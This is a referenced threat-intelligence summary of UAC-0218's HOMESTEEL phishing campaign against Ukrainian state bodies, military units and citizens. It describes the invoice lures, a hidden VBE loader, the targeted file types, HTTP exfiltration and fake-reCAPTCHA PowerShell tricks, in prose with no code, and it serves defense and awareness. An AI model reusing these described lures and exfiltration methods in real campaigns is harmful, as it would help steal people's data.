Introduction

Ukrainian authorities have issued a warning regarding a significant phishing attack orchestrated by the hacking group UAC-0218. This campaign targets Ukrainian citizens, state bodies [2], and military units to exfiltrate sensitive personal data. The attack employs a new malware variant, HOMESTEEL [2] [3] [5], which poses a substantial threat to critical data repositories within government and business networks.

Description

Ukrainian authorities have issued a warning about a large-scale phishing attack attributed to the hacking group UAC-0218, which targets citizens [4] [5], state bodies [2], and military units to steal sensitive personal data. This recent cyber campaign has introduced a new malware variant called HOMESTEEL, aimed at critical Ukrainian data repositories [5], particularly within government and business networks. The attackers primarily use deceptive email subjects such as “invoice” and “details” to lure victims into downloading malicious RAR archives disguised as bills or payment details. These archives contain password-protected decoy documents [2], including files labeled “Contract20102024.doc” and “Invoice20102024.xlsx,” along with a concealed Visual Basic Script (VBS) file named “Password.vbe,” which initiates HOMESTEEL’s data-siphoning operations [5].

HOMESTEEL is designed to search for specific file types within the user’s profile directory [2], including “xls,” “xlsx,” “doc,” “docx,” “pdf,” “txt,” “csv,” “rtf,” “ods,” “odt,” “eml,” “pst,” “rar,” and “zip,” and can scan user directories up to five subfolders deep. The malware exfiltrates files under 10MB to an attacker-controlled server via HTTP requests, utilizing both HTTP PUT and POST methods to minimize data size and evade detection while maximizing data collection. Each outgoing request includes the full path of the extracted file [5], aiding attackers in cataloging sensitive information for potential exploitation or blackmail.

The campaign has been active since at least August 2024 and has reportedly compromised over 100 Ukrainian government computers. It includes a ClickFix-style component that deceives users into clicking malicious links [3], leading to the execution of a PowerShell command capable of establishing an SSH tunnel [3], stealing data from web browsers [3], and launching the Metasploit framework [3]. Additionally, the attack employs a method that involves emails containing a database table and a link triggering a Google reCAPTCHA bot-detection dialog [1]. When users confirm they are not a robot [1], it initiates a malicious PowerShell command that is copied to the clipboard [1], requiring multiple user actions to execute the malware [1], including opening the command prompt [1], pasting the command [1], and pressing enter [1]. This reliance on user trust underscores the importance of vigilance against such cyber threats [1], particularly those utilizing AI-enhanced phishing techniques [1].

The control infrastructure for these attacks is characterized by the use of a domain registered with HostZealot and a custom Python-based web server [2], which displays a “Python Software Foundation BaseHTTP 0.6” banner [5], aiding analysts in attributing this campaign to UAC-0218’s infrastructure [5]. The Computer Emergency Response Team of Ukraine (CERT-UA) has not disclosed the attackers’ identities or specific targets [4], but the campaign is believed to be linked to the Russian advanced persistent threat actor APT28 (also known as UAC-0001) [3].

In response to the increasing phishing threats [2], cybersecurity professionals are enhancing their defenses and utilizing tools such as Sigma rules aligned with the MITRE ATT&CK framework to detect UAC-0218 activities and provide actionable threat intelligence for proactive defense against these types of attacks. Victims are encouraged to contact CERT-UA if they suspect they have been targeted [6], highlighting the importance of reporting incidents. The HOMESTEEL campaign raises significant concerns for Ukraine’s government amid ongoing cyber aggression [5], underscoring the evolving nature of cyber espionage tactics and refined phishing methodologies [5].

Conclusion

The HOMESTEEL campaign represents a significant threat to Ukraine’s cybersecurity landscape, highlighting the evolving tactics of cyber espionage and phishing [5]. The impact of such attacks is profound, necessitating enhanced vigilance and robust cybersecurity measures. Mitigation efforts include the use of advanced detection tools and frameworks, as well as prompt reporting of incidents to authorities like CERT-UA. As cyber threats continue to evolve, it is imperative for organizations and individuals to remain informed and proactive in their defense strategies to safeguard sensitive information and maintain national security.

References

[1] https://www.forbes.com/sites/daveywinder/2024/10/26/new-google-cyber-attack-warning-as-russian-apt28-hackers-strike/
[2] https://socprime.com/blog/uac-0218-attack-detection/
[3] https://thehackernews.com/2024/10/cert-ua-identifies-malicious-rdp-files.html
[4] https://www.infosecurity-magazine.com/news/ukraine-phishing-campaign-citizens/
[5] https://thecyberexpress.com/homesteel-malware-emerges-in-ukraine/
[6] https://internetua.com/aferisti-vikradauat-dani-ukrayinciv-vikoristovuuacsi-temu-rahunkiv-